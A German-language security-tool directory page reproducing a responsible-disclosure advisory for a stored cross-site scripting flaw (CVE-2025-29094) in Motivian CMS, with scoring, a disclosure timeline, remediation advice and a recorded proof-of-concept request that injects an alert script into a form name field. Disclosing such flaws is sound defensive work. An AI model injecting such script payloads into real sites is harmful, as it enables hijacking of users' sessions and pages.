Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-29094-Multiple-Stored-Cross-Site-Scripting-XSS — Dieses Repository zeigt eine Sicherheitslücke, die im Motivian Content Management System v.41.0.0 entdeckt wurde. | Kitploit
Tools/GitHubGitHub/framarcuccio/cve-2025-29094-multiple-stored-cross-site-scripting-xss
SchwachstellenanalyseExploitationInformationsbeschaffungWebsicherheitPenetrationstestsLernen & Bildung
GitHubframarcuccio/cve-2025-29094-multiple-stored-cross-site-scripting-xss

CVE-2025-29094-Multiple-Stored-Cross-Site-Scripting-XSS

Dieses Repository zeigt eine Sicherheitslücke, die im Motivian Content Management System v.41.0.0 entdeckt wurde.

Repository anzeigen
2vor 7 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-29094-Mehrere-gespeicherte-Cross-Site-Scripting-XSS

Dieses Repository zeigt eine Sicherheitslücke im Motivian Content Management System v.41.0.0.

  • CVE-2025-29094: Mehrere gespeicherte Cross-Site-Scripting (XSS)

Diese Schwachstelle wurde gemäß den Praktiken der verantwortungsvollen Offenlegung an den Hersteller sowie an MITRE gemeldet, die eine vorläufige CVE-ID zugewiesen hat. Die Details werden nach Ablauf der 45-tägigen Offenlegungsfrist veröffentlicht.

Allgemeine Informationen

  • Titel: Motivian Gespeichertes Cross-Site-Scripting (XSS)
  • Schwachstellentyp: Gespeichertes XSS
  • Anbieter des Produkts: Motivian
  • Produkt: Motivian Content Management System
  • Betroffene Version: Motivian CMS v.41.0.0
  • Betroffene Komponenten: Marketing/Forms, Marketing/Offers, Content/Pages
  • Angriffsvektor: Remote
  • Auswirkung: Ausführung von beliebigem JavaScript im Browser des Opfers
  • Schweregrad: Hoch
  • CVSSv3-Score: 7.6
  • CVSS:3.1:AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N
CVSSv3-Vektor:
  • Schweregrad nach CISA-ADP: Mittel
  • CVSSv3-Score nach CISA-ADP: 6.1
  • CVSSv3-Vektor nach CISA-ADP: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
  • Gefunden: 2025-01-29
  • Von: Francesco Marcuccio
  • Status: Am 7. April 2025 an den Hersteller gemeldet – Bis zum 22. Mai 2025 keine Antwort/kein Fix erhalten
  • Beschreibung

    Eine Cross-Site-Scripting-Schwachstelle im Motivian Content Mangment System v.41.0.0 ermöglicht es einem entfernten Angreifer, beliebigen Code über die Komponenten Marketing/Forms, Marketing/Offers und Content/Pages auszuführen. Die Schwachstelle wurde durch die Einschleusung von bösartigem JavaScript-Code in verschiedene Felder ausgenutzt, darunter den Titel in Marketing/Form und Marketing/Offers sowie das Feld Header Script in Content/Pages

    Proof of Concept

    Die Schwachstelle kann über verschiedene Felder in unterschiedlichen Komponenten ausgenutzt werden. Zu Demonstrationszwecken konzentriert sich der folgende Proof of Concept auf ein bestimmtes Szenario:

    1. Navigieren Sie zum Bereich Marketing/Forms und erstellen Sie ein neues Formularelement.
    2. Fügen Sie ein bösartiges Skript in das Feld Name ein und speichern Sie das Formular.

    Nachfolgend die vollständige Aufzeichnung der HTTP-Anfragen und -Antworten, die zur Demonstration des Problems verwendet wurden:

    Burp Request

    root@kitploit:~
    POST /portal/admin/formbuilder/editCmsFormProps!saveForm.action HTTP/1.1
    Host: [REDACTED]
    Content-Length: 1362
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: [REDACTED]
    Connection: close
    
    targetFieldId=&targetFormId=&targetFieldIndex=&openedTabProps=tab1&langSelected=it&form.id=1162&search_form_id=&search_form_status_id=&search_form_name=&search_form_description=&date_from=&date_to=&currentPage=&struts.token.name=EditCmsFormProps&EditCmsFormProps=DBFW4RH1O9SVF1J3J9TA0WSD5VHPJCKY&date_notification=&form.seoName_en=&form.seoName_el=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&[...]
    

    Burp Response

    root@kitploit:~
    HTTP/1.1 200 OK
    Connection: close
    Date: Wed, 05 Feb 2025 12:00:09 GMT
    Content-Type: text/html;charset=ISO-8859-1
    Content-Language: it-IT
    Content-Length: 94593
    
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <title>MOTIVIAN | Content Management</title> <link rel="shortcut icon" type="image/x-icon" href="/portal/favicon.ico"/> <link rel="icon" type="image/x-icon" href="/portal/favicon.ico"/> <script> <a href="javascript:void(0)" class="sortingRow" onclick="javascript:simplePagesFormDoSort('status','asc')" >Status</a></td> <td class="TableHeader" colspan="9" style="width:188px">Management</td> <td class="TableHeader w10">&nbsp;</td> </tr> </table> </td> </tr> <tr> <td class="w10 row_odd">&nbsp;</td> <td class="w70 row_odd"> <div class="check-box w70" style="float:left"> <input type="checkbox" id="subpages_formIds_id_1162" name="formIds" value="1162"> <label for="subpages_formIds_id_1162">1162 </label> </div> </td> <td class="w40 row_odd"><img src="https://raw.githubusercontent.com/framarcuccio/cve-2025-29094-multiple-stored-cross-site-scripting-xss/main/portal/assets/images/red_form.png"/></td> <td class="NameCol row_odd"> <div class="wrap_words_within_rows w155"><script>alert(document.domain)</script> [...]
    

    Behebung

    Bereinigen Sie sämtliche Benutzereingaben und escapen Sie die Ausgabe vor der Darstellung. Implementieren Sie einen CSP-Header (Content Security Policy), um XSS-Risiken zu mindern.

    Offenlegungszeitplan

    DatumAktion
    2025-02-06CVE-ID-Anfrage (CNA: MITRE)
    2025-04-02CVE-ID-Zuweisung
    2025-04-07Schwachstellen an Hersteller gemeldet
    2025-05-31Öffentliche Offenlegung nach Ablauf der 45-tägigen Offenlegungsfrist (insgesamt 54 Tage)
    2025-06-04Offizielle Registrierung und Eintrag in der MITRE-Datenbank und im NIST/NVD-Portal

    Credits

    • Entdeckt und verantwortungsvoll offengelegt von:
      Francesco Marcuccio
      CyberSecurity-Berater, Penetrationstester

    • Die MITRE-Entdeckerzuordnung lautet:
      Francesco Marcuccio
      CyberSecurity-Berater, Penetrationstester

    Links

    Referenzlinks: MITRE NIST

    Status

    Diese CVE-ID befindet sich offiziell im Status VERÖFFENTLICHT. Sie wird nach der Analyse von NIST mit einem CVSS-Score aktualisiert.

    Tool herunterladen